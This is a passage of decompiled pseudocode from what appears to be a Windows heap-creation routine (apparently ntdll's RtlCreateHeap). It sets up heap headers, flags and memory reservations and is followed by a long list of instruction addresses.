								if( *((intOrPtr*)(_t759 - 0x94)) == 0) {
									 *((intOrPtr*)(_t759 - 0x94)) = _t440 -  *0x1f0b6940 - _t699;
								}
								if( *((intOrPtr*)(_t759 - 0x90)) != 0) {
									__eflags =  *((intOrPtr*)(_t759 - 0x90)) - 0x7f000;
									if( *((intOrPtr*)(_t759 - 0x90)) <= 0x7f000) {
										L29:
										_t443 =  *(_t759 - 0xc0);
										if(_t443 != 0) {
											_t699 = _t443 + 0x00000fff & 0xfffff000;
										}
										 *(_t759 - 0xc4) = _t699;
										_t724 =  *(_t759 - 0xc8);
										if(_t724 != 0) {
											_t629 = _t724 + 0x00000fff & 0xfffff000;
										} else {
											_t62 = _t699 + 0xffff; // 0x10fff
											_t629 = _t62 & 0xffff0000;
										}
										 *(_t759 - 0xbc) = _t629;
										_t747 = _t699;
										if(_t699 > _t629) {
											_t699 = _t629;
											 *(_t759 - 0xc4) = _t629;
											_t747 = _t629;
										}
										_t444 =  *(_t759 - 0xb0);
										_t719 =  *(_t759 - 0xb8);
										if((_t444 & 0x00000002) == 0 || _t719 != 0) {
											 *(_t759 - 0xd4) = 0;
										} else {
											 *(_t759 - 0xd4) = 0x1000;
											 *(_t759 - 0xe4) = 2;
											_t70 = _t629 - 0x1000; // 0xffff
											_t444 =  *(_t759 - 0xb0);
											if(_t70 < _t747) {
												_t629 = _t629 + 0x00010fff & 0xffff0000;
												 *(_t759 - 0xbc) = _t629;
											}
										}
										if(_t747 == 0 || _t629 == 0) {
											goto L110;
										} else {
											if((_t444 & 0x61000000) != 0) {
												__eflags = _t444 & 0x10000000;
												if((_t444 & 0x10000000) != 0) {
													goto L39;
												}
												_t420 = E1F06F51B(_t444, _t719, _t629, _t699,  *(_t759 - 0xb4), _t759 - 0xa8);
												goto L87;
											}
											L39:
											 *(_t759 - 0xc8) = 0x258;
											_t693 =  *(_t759 - 0xb4);
											if((_t444 & 0x00000001) != 0) {
												__eflags = _t693;
												if(_t693 == 0) {
													L42:
													if(_t719 != 0) {
														__eflags =  *(_t759 - 0x84);
														if( *(_t759 - 0x84) != 0) {
															_t701 =  *(_t759 - 0x8c);
															__eflags = _t701;
															if(_t701 == 0) {
																goto L110;
															}
															_t630 =  *(_t759 - 0x88);
															__eflags = _t630;
															if(_t630 == 0) {
																goto L110;
															}
															__eflags = _t701 - _t630;
															if(_t701 > _t630) {
																goto L110;
															}
															__eflags = _t444 & 0x00000002;
															if((_t444 & 0x00000002) != 0) {
																goto L110;
															}
															 *(_t759 - 0xcc) = _t719;
															 *(_t759 - 0xc0) = _t719 + _t701;
															 *(_t759 - 0xbc) = _t630;
															E1F008F40(_t719, 0, 0x1000);
															_t764 = _t764 + 0xc;
															L108:
															_t748 =  *(_t759 - 0xb0);
															L100:
															 *(_t759 - 0xe4) =  *(_t759 - 0xe4) | 0x00000001;
															_t702 = _t719;
															 *(_t759 - 0xac) = _t702;
															_t726 = _t748 & 0x00040000;
															_t631 =  *(_t759 - 0xc0);
															_t447 =  *(_t759 - 0xcc);
															L49:
															if(_t447 != _t631) {
																L55:
																_t727 = _t702 + 0x258;
																if(( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
																	 *( *(_t759 - 0xac) + 0xbc) = _t727 + 0x00000007 & 0xfffffff8;
																	 *(_t759 - 0xc8) =  *(_t759 - 0xc8) + 0x60c;
																	_t727 =  *( *(_t759 - 0xac) + 0xbc) + 0x60c;
																	 *(_t759 - 0xb0) =  *(_t759 - 0xb0) | 0x04000000;
																	_t748 =  *(_t759 - 0xb0);
																}
																_t453 =  *(_t759 - 0xc8) + 0x00000007 & 0xfffffff8;
																 *(_t759 - 0xe8) = _t453;
																 *( *(_t759 - 0xac)) = _t453 >> 3;
																 *((char*)( *(_t759 - 0xac) + 2)) = 1;
																 *((char*)( *(_t759 - 0xac) + 7)) = 1;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x60)) = 0xeeffeeff;
																 *( *(_t759 - 0xac) + 0x40) = _t748 & 0xefffffff;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x58)) = 0;
																E1F008F40( *(_t759 - 0xac) + 0x1f4, 0, 0x5c);
																E1EFC22E1( *(_t759 - 0xac));
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x234)) = 1;
																_t750 =  *(_t759 - 0xac);
																if(( *(_t750 + 0x40) & 0x08000000) != 0) {
																	 *(_t750 + 0x58) = E1F07D8FD(0x1f07fd00) & 0x0000ffff;
																	 *( *(_t759 - 0xac) + 0x40) =  *( *(_t759 - 0xac) + 0x40) & 0xffffffbf;
																	_t750 =  *(_t759 - 0xac);
																}
																_t703 =  *(_t759 - 0xb0);
																 *(_t750 + 0x44) = _t703 & 0x6001007d;
																 *((short*)( *(_t759 - 0xac) + 0x7e)) = _t727 -  *(_t759 - 0xac);
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x80)) = 0;
																_t473 =  *(_t759 - 0xac) + 0xc0;
																 *((intOrPtr*)(_t473 + 4)) = _t473;
																 *_t473 = _t473;
																_t475 =  *(_t759 - 0xac) + 0x9c;
																 *((intOrPtr*)(_t475 + 4)) = _t475;
																 *_t475 = _t475;
																_t477 =  *(_t759 - 0xac) + 0xa4;
																 *((intOrPtr*)(_t477 + 4)) = _t477;
																 *_t477 = _t477;
																_t479 =  *(_t759 - 0xac) + 0x8c;
																 *((intOrPtr*)(_t479 + 4)) = _t479;
																 *_t479 = _t479;
																_t641 =  *(_t759 - 0xd0);
																if(_t641 != 0 || (_t703 & 0x00000001) != 0) {
																	L61:
																	 *( *(_t759 - 0xac) + 0xc8) = _t641;
																	 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) | 0x80000000;
																	if(E1EFF1EED( *(_t759 - 0xac),  *(_t759 - 0xac),  *(_t759 - 0xe8) + 0x238, _t641,  *(_t759 - 0xe4),  *(_t759 - 0xcc),  *(_t759 - 0xc0),  *(_t759 - 0xcc) -  *(_t759 - 0xd4) +  *(_t759 - 0xbc)) == 0) {
																		goto L117;
																	}
																	if( *(_t759 - 0xb8) != 0) {
																		E1F008F40(_t727, 0, 0x80);
																	}
																	 *((intOrPtr*)(_t727 + 4)) = 0x80;
																	_t643 = _t727 + 0x24;
																	 *((intOrPtr*)(_t727 + 0x1c)) = _t643;
																	 *(_t727 + 0x18) =  *(_t759 - 0xac) + 0xc0;
																	 *((intOrPtr*)(_t727 + 0x20)) = _t643 + 0x10;
																	E1EFC1A24( *(_t759 - 0xac), _t727);
																	 *((short*)( *(_t759 - 0xac) + 0x7c)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x64)) =  *((intOrPtr*)(_t759 - 0xa4));
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x68)) =  *((intOrPtr*)(_t759 - 0xa0));
																	 *( *(_t759 - 0xac) + 0x6c) =  *(_t759 - 0x9c) >> 3;
																	 *( *(_t759 - 0xac) + 0x70) =  *(_t759 - 0x98) >> 3;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x78)) =  *((intOrPtr*)(_t759 - 0x94));
																	 *( *(_t759 - 0xac) + 0x5c) =  *((intOrPtr*)(_t759 - 0x90)) + 7 >> 3;
																	 *( *(_t759 - 0xac) + 0xcc) =  *(_t759 - 0x84) ^  *0x1f0b6d48;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x250)) = 4;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x254)) = 0xfe000;
																	if(( *0x1f0b6934 & 1) != 0) {
																		 *( *(_t759 - 0xac) + 0x48) = 1;
																	}
																	_t658 =  *(_t759 - 0xb0);
																	_t505 =  *(_t759 - 0xac);
																	if((_t658 & 0x00010000) != 0) {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0x17;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff0;
																	} else {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0xf;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff8;
																	}
																	_t507 =  *(_t759 - 0xac);
																	if(( *(_t507 + 0x40) & 0x00000020) != 0) {
																		 *((intOrPtr*)(_t507 + 0x94)) =  *((intOrPtr*)(_t507 + 0x94)) + 8;
																		_t507 =  *(_t759 - 0xac);
																	}
																	 *((intOrPtr*)(_t507 + 0xe4)) = 0;
																	 *((short*)( *(_t759 - 0xac) + 0xe8)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xea)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xeb)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0xb8)) = 0;
																	_t513 = _t658 & 0x00000003;
																	_t659 = _t658 & 0xffffff00 | _t513 == 0x00000002;
																	if(((_t513 & 0xffffff00 | ( *0x1f0b6934 & 1) == 0x00000000) & (_t658 & 0xffffff00 | _t513 == 0x00000002)) == 0) {
																		L70:
																		E1EFCFED0(0x1f0b4800);
																		E1EFF666D( *(_t759 - 0xac));
																		_push(0x1f0b4800);
																		E1EFCE740( *(_t759 - 0xac));
																		if( *((intOrPtr*)( *(_t759 - 0xac) + 0x7c)) == 0) {
																			goto L117;
																		}
																		_t519 = E1EFD3C40();
																		_t753 = 0x7ffe0380;
																		if(_t519 != 0) {
																			_t522 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																		} else {
																			_t522 = 0x7ffe0380;
																		}
																		if( *_t522 != 0) {
																			_t523 =  *[fs:0x30];
																			__eflags =  *(_t523 + 0x240) & 0x00000001;
																			if(( *(_t523 + 0x240) & 0x00000001) == 0) {
																				goto L74;
																			}
																			__eflags = E1EFD3C40();
																			if(__eflags != 0) {
																				_t753 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																				__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																			}
																			_t754 =  *(_t759 - 0xb0);
																			E1F07F0E5(0,  *(_t759 - 0xac),  *(_t759 - 0xb0), 0x1f0b4800, __eflags,  *(_t759 - 0xbc),  *(_t759 - 0xc4),  *_t753 & 0x000000ff);
																			goto L75;
																		} else {
																			L74:
																			_t754 =  *(_t759 - 0xb0);
																			L75:
																			_t524 = E1EFD3C40();
																			_t731 = 0x7ffe038a;
																			if(_t524 != 0) {
																				_t527 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																			} else {
																				_t527 = 0x7ffe038a;
																			}
																			if( *_t527 != 0) {
																				__eflags = E1EFD3C40();
																				if(__eflags != 0) {
																					_t731 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																					__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																				}
																				E1F07F0E5(0,  *(_t759 - 0xac), _t754, _t731, __eflags,  *(_t759 - 0xbc),  *(_t759 - 0xc4),  *_t731 & 0x000000ff);
																			}
																			if(E1EFD3C40() != 0) {
																				_t534 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
																			} else {
																				_t534 = 0x7ffe0388;
																			}
																			if( *_t534 != 0) {
																				E1F07D947(0,  *(_t759 - 0xac),  *(_t759 - 0xbc), _t754);
																			}
																			 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) & 0x7fffffff;
																			 *((intOrPtr*)( *(_t759 - 0xac) + 0xd0)) = 0;
																			_t742 =  *(_t759 - 0xac);
																			 *(_t759 - 0xac) = 0;
																			 *(_t759 - 0xd0) = 0;
																			goto L82;
																		}
																	} else {
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0xec)) = E1EFD5D90(_t659,  *(_t759 - 0xac), 0x80000a, 0x100);
																		_t545 =  *((intOrPtr*)( *(_t759 - 0xac) + 0xec));
																		if(_t545 == 0) {
																			goto L117;
																		}
																		 *((char*)(_t545 - 1)) = 1;
																		 *((short*)( *(_t759 - 0xac) + 0xf0)) = 0x80;
																		goto L70;
																	}
																} else {
																	 *(_t759 - 0xd0) = _t727;
																	if(E1EFEFBC0(_t727, 0, 0x10000000) < 0) {
																		 *(_t759 - 0xd0) = 0;
																		goto L117;
																	}
																	_t727 = _t727 + 0x18;
																	_t641 =  *(_t759 - 0xd0);
																	goto L61;
																}
															}
															asm("sbb edi, edi");
															_push(( ~_t726 & 0x0000003c) + 4);
															_push(0x1000);
															_push(_t759 - 0xc4);
															_push(0);
															_push(_t759 - 0xcc);
															_push(0xffffffff);
															if(E1F002B10() < 0) {
																goto L117;
															}
															if(E1EFD3C40() != 0) {
																_t666 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
															} else {
																_t666 = 0x7ffe0380;
															}
															if( *_t666 != 0) {
																_t554 =  *[fs:0x30];
																__eflags =  *(_t554 + 0x240) & 0x00000001;
																if(( *(_t554 + 0x240) & 0x00000001) != 0) {
																	E1F07EFD3(0,  *(_t759 - 0xac),  *(_t759 - 0xcc),  *(_t759 - 0xc4), 1);
																}
															}
															 *(_t759 - 0xc0) =  *(_t759 - 0xc0) +  *(_t759 - 0xc4);
															_t702 =  *(_t759 - 0xac);
															goto L55;
														}
														_push(0);
														_push(0x1c);
														_push(_t759 - 0x110);
														_push(0);
														_push(_t719);
														_push(0xffffffff);
														_t557 = E1F002BE0();
														__eflags = _t557;
														if(_t557 < 0) {
															goto L110;
														}
														_t558 =  *(_t759 - 0x110);
														 *(_t759 - 0xc0) = _t558;
														__eflags = _t558 - _t719;
														if(_t558 != _t719) {
															goto L110;
														}
														__eflags =  *((intOrPtr*)(_t759 - 0x100)) - 0x10000;
														if( *((intOrPtr*)(_t759 - 0x100)) == 0x10000) {
															goto L110;
														}
														 *(_t759 - 0xcc) = _t558;
														__eflags =  *((intOrPtr*)(_t759 - 0x100)) - 0x1000;
														if( *((intOrPtr*)(_t759 - 0x100)) != 0x1000) {
															_t671 =  *(_t759 - 0x104);
															 *(_t759 - 0xbc) = _t671;
															_t559 =  *(_t759 - 0xc4);
															__eflags = _t559 - _t671;
															if(_t559 > _t671) {
																_t559 = _t671;
																 *(_t759 - 0xc4) = _t559;
															}
															__eflags = _t559 - 0x1000;
															if(_t559 < 0x1000) {
																goto L110;
															} else {
																goto L108;
															}
														}
														_t748 =  *(_t759 - 0xb0);
														__eflags = _t748 & 0x00040000;
														if((_t748 & 0x00040000) != 0) {
															__eflags =  *(_t759 - 0xfc) & 0x00000040;
															if(( *(_t759 - 0xfc) & 0x00000040) == 0) {
																goto L110;
															}
														}
														E1F008F40(_t558, 0, 0x1000);
														_t764 = _t764 + 0xc;
														_push(0);
														_push(0x1c);
														_push(_t759 - 0x12c);
														_push(3);
														_push(_t719);
														_push(0xffffffff);
														_t562 = E1F002BE0();
														__eflags = _t562;
														if(_t562 < 0) {
															goto L110;
														}
														 *(_t759 - 0xbc) =  *(_t759 - 0x120);
														_t564 =  *(_t759 - 0x104);
														 *(_t759 - 0xc4) = _t564;
														_t565 =  *(_t759 - 0xcc) + _t564;
														__eflags = _t565;
														 *(_t759 - 0xc0) = _t565;
														goto L100;
													}
													 *(_t759 - 0xdc) = 0;
													if( *(_t759 - 0x84) != _t719) {
														L172:
														_t742 = 0;
														goto L84;
													}
													 *(_t759 - 0xe8) = E1EFC2330(_t629);
													_t570 = (E1EFC2330(_t629) & 0x0000001f) << 0x10;
													 *(_t759 - 0xd8) = _t570;
													_t672 =  *(_t759 - 0xbc);
													_t571 = _t570 + _t672;
													 *(_t759 - 0xe0) = _t571;
													if(_t571 < _t672) {
														 *(_t759 - 0xe0) = _t672;
														 *(_t759 - 0xd8) = 0;
													}
													_t748 =  *(_t759 - 0xb0);
													_t726 = _t748 & 0x00040000;
													asm("sbb eax, eax");
													_push(( ~_t726 & 0x0000003c) + 4);
													_push(0x2000);
													_push(_t759 - 0xe0);
													_push(0);
													_push(_t759 - 0xdc);
													_push(0xffffffff);
													if(E1F002B10() < 0) {
														goto L117;
													} else {
														_t702 =  *(_t759 - 0xdc);
														 *(_t759 - 0xac) = _t702;
														 *(_t759 - 0xbc) =  *(_t759 - 0xe0);
														if( *(_t759 - 0xd8) != 0) {
															E1EFBFABA(_t759 - 0xdc, _t759 - 0xd8, 0x8000);
															_t702 =  *(_t759 - 0xdc) +  *(_t759 - 0xd8);
															 *(_t759 - 0xac) = _t702;
															 *(_t759 - 0xbc) =  *(_t759 - 0xe0) -  *(_t759 - 0xd8);
														}
														_t447 = _t702;
														 *(_t759 - 0xcc) = _t447;
														_t631 = _t702;
														 *(_t759 - 0xc0) = _t631;
														goto L49;
													}
												}
												goto L172;
											}
											if(_t693 != 0) {
												_t444 = _t444 | 0x80000000;
												 *(_t759 - 0xb0) = _t444;
											}
											asm("sbb ecx, ecx");
											 *(_t759 - 0xd0) =  ~_t693 & _t693;
											asm("sbb ecx, ecx");
											_t629 = ( ~_t693 & 0xffffffe8) + 0x270;
											 *(_t759 - 0xc8) = ( ~_t693 & 0xffffffe8) + 0x270;
											goto L42;
										}
									}
								}
								 *((intOrPtr*)(_t759 - 0x90)) = 0x7f000;
								goto L29;
							}
							_t774 =  *0x1f0b6960 - _t424; // 0x0
							if(_t774 >= 0) {
								__eflags = _t692 & 0xfff80c00;
								if((_t692 & 0xfff80c00) == 0) {
									goto L9;
								}
								_t592 =  *[fs:0x30];
								__eflags =  *(_t592 + 0xc);
								if( *(_t592 + 0xc) == 0) {
									_push("HEAP: ");
									E1EFBB910();
								} else {
									E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("!(CheckedFlags & ~HEAP_CREATE_VALID_MASK)");
								E1EFBB910();
								__eflags =  *0x1f0b5da8; // 0x0
								if(__eflags == 0) {
									_t686 = 2;
									E1F07FC95(0, _t686, _t718, __eflags);
								}
								_t692 =  *(_t759 - 0xb0);
							}
							if((_t692 & 0xfff80c00) != 0) {
								 *(_t759 - 0xb0) = _t692 & 0x0007f3ff;
							}
							goto L9;
						}
					}
					if(( *0x1f0b6938 & 0x00000001) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L4;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L4;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							L135:
							_t424 = 2;
							__eflags =  *(_t759 - 0xb4);
							if( *(_t759 - 0xb4) == 0) {
								_t742 = _t759 - 0x4c;
							}
							goto L5;
						}
						_t605 = E1F080A4D(_t718);
						__eflags = _t605;
						if(_t605 == 0) {
							goto L4;
						}
						goto L135;
					}
					goto L4;
				}
				L1:
				_t769 =  *0x1f0b3744; // 0x0
				if(_t769 != 0) {
					__eflags = _t718 - 1;
					if(_t718 == 1) {
						asm("sbb eax, eax");
						_t718 = _t718 &  !( ~(_t691 & 0x00000100));
					}
				}
				goto L2;
			}

0x1efd0f90
0x1efd0f95
0x1efd0f9a
0x1efd0f9f
0x1efd0fa2
0x1efd0fa8
0x1efd0fab
0x1efd0fb1
0x1efd0fb4
0x1efd0fba
0x1efd0fc0
0x1efd0fc3
0x1efd0fc9
0x1efd0fcc
0x1efd0fd2
0x1efd0fd8
0x1efd0fe4
0x1efd0fec
0x1efd0ff2
0x1efd0ffa
0x1efd1000
0x1efd1006
0x1f025459
0x1f02545f
0x00000000
0x00000000
0x1f025465
0x1f02546b
0x00000000
0x00000000
0x1f025477
0x1f02547f
0x1f025485
0x1f025487
0x1f025489
0x1f02548b
0x1efd17d4
0x1efd17d4
0x1efd17da
0x1efd17da
0x1efd17e0
0x1efd17e0
0x1efd17e8
0x1f025a49
0x1f025a4b
0x1f025a52
0x1f025a52
0x1f025a4b
0x1efd17f5
0x1f025a5c
0x1f025a5e
0x1f025a64
0x1f025a7c
0x1f025a7c
0x1f025a5e
0x1efd17fb
0x1efd17fd
0x1efd1800
0x1efd180c
0x1efd180c
0x1f025491
0x1f025494
0x1f0254af
0x1f0254af
0x1efd1992
0x1efd1992
0x00000000
0x1efd1992
0x1f025496
0x1f025498
0x1f02549e
0x1efd1018
0x1efd1018
0x1efd101e
0x1efd1024
0x1efd102c
0x1f0254d7
0x1f0254da
0x00000000
0x00000000
0x1f0254e0
0x1f0254e6
0x00000000
0x00000000
0x1f0254ec
0x1f0254ee
0x00000000
0x00000000
0x1f0254f4
0x1f0254fa
0x00000000
0x00000000
0x1f025500
0x1f025506
0x00000000
0x00000000
0x1f02550c
0x1f02550f
0x1f025511
0x1f025518
0x1f02551c
0x1f02551c
0x1f02551c
0x1f02551e
0x1f025520
0x1f02553a
0x00000000
0x1f025522
0x1f025522
0x1f025526
0x1f02552b
0x1f02552d
0x00000000
0x00000000
0x1f02552f
0x1efd103f
0x1efd1041
0x1efd1042
0x1efd1044
0x1f025584
0x1f025586
0x1f02558a
0x1f02558e
0x1f025598
0x1f025599
0x1f02559c
0x1f0255a0
0x1f0255a7
0x1f0255a7
0x1f0255a7
0x1f0255a7
0x1f0255ab
0x1f0255af
0x1f0255f8
0x1f0255fa
0x1f025600
0x1f025606
0x1f025608
0x1f02560a
0x1f02560a
0x1f02560c
0x1f02560e
0x1f025610
0x1f025610
0x1f02562f
0x1f025631
0x1f025633
0x1f025640
0x1f025645
0x1f025649
0x1f025651
0x1f025656
0x1f025656
0x1f025649
0x00000000
0x1f0255b1
0x1f0255b1
0x1f0255b7
0x00000000
0x00000000
0x1f0255cc
0x1f0255da
0x1f0255e2
0x1f0255ea
0x00000000
0x1f0255ea
0x1f0255af
0x1efd1050
0x1efd106a
0x1efd106c
0x1efd1076
0x1efd107b
0x1efd1080
0x1efd1932
0x1efd1935
0x1efd1937
0x1efd193b
0x1efd1944
0x1efd1944
0x1efd1944
0x1efd1946
0x1efd1946
0x1efd1086
0x1efd108c
0x1efd1095
0x1f025707
0x1f02570a
0x1f02570a
0x1efd109e
0x1f025715
0x1f025718
0x1f025718
0x1efd10af
0x1f025723
0x1f025725
0x1f025725
0x1efd10b8
0x1f025730
0x1f025735
0x1f025735
0x1efd10c0
0x1f025740
0x1f025745
0x1f025745
0x1efd10c6
0x1efd10cd
0x1f025755
0x1f025755
0x1efd10d3
0x1efd10e1
0x1efd10e6
0x1efd10e6
0x1efd10f3
0x1efd10f8
0x1efd10f8
0x1efd1105
0x1efd110d
0x1efd110d
0x1efd111a
0x1efd1122
0x1efd1122
0x1efd1128
0x1efd112f
0x1f025760
0x1f02576a
0x1f02576b
0x1f025770
0x1f025771
0x1f025772
0x1f025777
0x1f025779
0x00000000
0x00000000
0x1f02577f
0x1f025782
0x1f025787
0x1f025787
0x1efd113c
0x1efd1146
0x1efd1146
0x1efd1153
0x1f025791
0x1f02579b
0x1efd1163
0x1efd1163
0x1efd116b
0x1efd1815
0x1efd1815
0x1efd1171
0x1efd1177
0x1efd117f
0x1efd1958
0x1efd1185
0x1efd1185
0x1efd118b
0x1efd118b
0x1efd1191
0x1efd1197
0x1efd119b
0x1f0257a6
0x1f0257a8
0x1f0257ae
0x1f0257ae
0x1efd11a1
0x1efd11a7
0x1efd11af
0x1efd182d
0x1efd11bd
0x1efd11bd
0x1efd11c7
0x1efd11d1
0x1efd11d9
0x1efd11df
0x1f0257bb
0x1f0257c1
0x1f0257c1
0x1efd11df
0x1efd11e7
0x00000000
0x1efd11f5
0x1efd11fa
0x1f0257cc
0x1f0257d1
0x00000000
0x00000000
0x1f0257ea
0x00000000
0x1f0257ea
0x1efd1200
0x1efd1200
0x1efd120a
0x1efd1212
0x1efd1820
0x1efd1822
0x1efd1243
0x1efd1245
0x1efd1838
0x1efd183f
0x1f02580b
0x1f025811
0x1f025813
0x00000000
0x00000000
0x1f025819
0x1f02581f
0x1f025821
0x00000000
0x00000000
0x1f025827
0x1f025829
0x00000000
0x00000000
0x1f02582f
0x1f025831
0x00000000
0x00000000
0x1f025837
0x1f025840
0x1f025846
0x1f025853
0x1f025858
0x1efd197d
0x1efd197d
0x1efd18fa
0x1efd18fa
0x1efd1901
0x1efd1903
0x1efd190b
0x1efd1911
0x1efd1917
0x1efd133b
0x1efd133d
0x1efd13a0
0x1efd13a0
0x1efd13b3
0x1f0258d4
0x1f0258df
0x1f0258f1
0x1f0258f3
0x1f0258fd
0x1f0258fd
0x1efd13c2
0x1efd13c5
0x1efd13d6
0x1efd13df
0x1efd13e9
0x1efd13f3
0x1efd1406
0x1efd140f
0x1efd1421
0x1efd142f
0x1efd143a
0x1efd1444
0x1efd1451
0x1f025915
0x1f02591e
0x1f025922
0x1f025922
0x1efd1457
0x1efd1464
0x1efd1471
0x1efd147b
0x1efd1487
0x1efd148c
0x1efd148f
0x1efd1497
0x1efd149c
0x1efd149f
0x1efd14a7
0x1efd14ac
0x1efd14af
0x1efd14b7
0x1efd14bc
0x1efd14bf
0x1efd14c1
0x1efd14c9
0x1efd14f3
0x1efd14f9
0x1efd1505
0x1efd154e
0x00000000
0x00000000
0x1efd1560
0x1efd1925
0x1efd192a
0x1efd1566
0x1efd1569
0x1efd156c
0x1efd157a
0x1efd1580
0x1efd158b
0x1efd1598
0x1efd15a8
0x1efd15b7
0x1efd15c9
0x1efd15db
0x1efd15ea
0x1efd15ff
0x1efd1614
0x1efd1620
0x1efd1630
0x1efd1643
0x1f025933
0x1f025933
0x1efd1649
0x1efd164f
0x1efd165b
0x1f02593b
0x1f02594b
0x1efd1661
0x1efd1661
0x1efd1671
0x1efd1671
0x1efd167b
0x1efd1685
0x1f02595a
0x1f025961
0x1f025961
0x1efd168b
0x1efd1699
0x1efd16a6
0x1efd16b2
0x1efd16be
0x1efd16c6
0x1efd16ca
0x1efd16d8
0x1efd1720
0x1efd172c
0x1efd1733
0x1efd1738
0x1efd1739
0x1efd1748
0x00000000
0x00000000
0x1efd174e
0x1efd1753
0x1efd175a
0x1f025975
0x1efd1760
0x1efd1760
0x1efd1760
0x1efd1765
0x1f02597f
0x1f025985
0x1f02598c
0x00000000
0x00000000
0x1f025997
0x1f025999
0x1f0259a4
0x1f0259a4
0x1f0259a4
0x1f0259ba
0x1f0259c8
0x00000000
0x1efd176b
0x1efd176b
0x1efd176b
0x1efd1771
0x1efd1771
0x1efd1776
0x1efd177d
0x1f0259db
0x1efd1783
0x1efd1783
0x1efd1783
0x1efd1788
0x1f0259ea
0x1f0259ec
0x1f0259f7
0x1f0259f7
0x1f0259f7
0x1f025a15
0x1f025a15
0x1efd1795
0x1f025a28
0x1efd179b
0x1efd179b
0x1efd179b
0x1efd17a3
0x1f025a3f
0x1f025a3f
0x1efd17af
0x1efd17bc
0x1efd17c2
0x1efd17c8
0x1efd17ce
0x00000000
0x1efd17ce
0x1efd16da
0x1efd16f5
0x1efd1701
0x1efd1709
0x00000000
0x00000000
0x1efd170f
0x1efd1719
0x00000000
0x1efd1719
0x1efd14d0
0x1efd14d0
0x1efd14e4
0x1f0254a9
0x00000000
0x1f0254a9
0x1efd14ea
0x1efd14ed
0x00000000
0x1efd14ed
0x1efd14c9
0x1efd1341
0x1efd1349
0x1efd134a
0x1efd1355
0x1efd1356
0x1efd135d
0x1efd135e
0x1efd1367
0x00000000
0x00000000
0x1efd1374
0x1f02588c
0x1efd137a
0x1efd137a
0x1efd137a
0x1efd1382
0x1f025897
0x1f02589d
0x1f0258a4
0x1f0258be
0x1f0258be
0x1f0258a4
0x1efd1394
0x1efd139a
0x00000000
0x1efd139a
0x1efd1845
0x1efd1846
0x1efd184e
0x1efd184f
0x1efd1850
0x1efd1851
0x1efd1853
0x1efd1858
0x1efd185a
0x00000000
0x00000000
0x1efd1860
0x1efd1866
0x1efd186c
0x1efd186e
0x00000000
0x00000000
0x1efd1874
0x1efd187e
0x00000000
0x00000000
0x1efd1886
0x1efd1891
0x1efd1897
0x1efd1963
0x1efd1969
0x1efd196f
0x1efd1975
0x1efd1977
0x1efd1988
0x1efd198a
0x1efd198a
0x1efd1979
0x1efd197b
0x00000000
0x00000000
0x00000000
0x00000000
0x1efd197b
0x1efd189d
0x1efd18a3
0x1efd18a9
0x1f025860
0x1f025867
0x00000000
0x00000000
0x1f02586d
0x1efd18b2
0x1efd18b7
0x1efd18ba
0x1efd18bb
0x1efd18c3
0x1efd18c4
0x1efd18c6
0x1efd18c7
0x1efd18c9
0x1efd18ce
0x1efd18d0
0x00000000
0x00000000
0x1efd18dc
0x1efd18e2
0x1efd18e8
0x1efd18ee
0x1efd18ee
0x1efd18f4
0x00000000
0x1efd18f4
0x1efd124b
0x1efd1257
0x1f025804
0x1f025804
0x00000000
0x1f025804
0x1efd1262
0x1efd1272
0x1efd1275
0x1efd127b
0x1efd1281
0x1efd1283
0x1efd128b
0x1f025872
0x1f025878
0x1f025878
0x1efd1291
0x1efd1299
0x1efd12a3
0x1efd12ab
0x1efd12ac
0x1efd12b7
0x1efd12b8
0x1efd12bf
0x1efd12c0
0x1efd12c9
0x00000000
0x1efd12cf
0x1efd12cf
0x1efd12d5
0x1efd12e1
0x1efd12ee
0x1efd1302
0x1efd130d
0x1efd1313
0x1efd1325
0x1efd1325
0x1efd132b
0x1efd132d
0x1efd1333
0x1efd1335
0x00000000
0x1efd1335
0x1efd12c9
0x00000000
0x1efd1828
0x1efd121a
0x1f0257f4
0x1f0257f9
0x1f0257f9
0x1efd1224
0x1efd1228
0x1efd1232
0x1efd1237
0x1efd123d
0x00000000
0x1efd123d
0x1efd11e7
0x1f0257a1
0x1efd1159
0x00000000
0x1efd1159
0x1efd1052
0x1efd1058
0x1f02565d
0x1f025663
0x00000000
0x00000000
0x1f025669
0x1f02566f
0x1f025672
0x1f025691
0x1f025696
0x1f025674
0x1f025689
0x1f02568e
0x1f02569c
0x1f0256a1
0x1f0256a7
0x1f0256ad
0x1f0256b1
0x1f0256b2
0x1f0256b2
0x1f0256b7
0x1f0256b7
0x1efd1064
0x1f0256c8
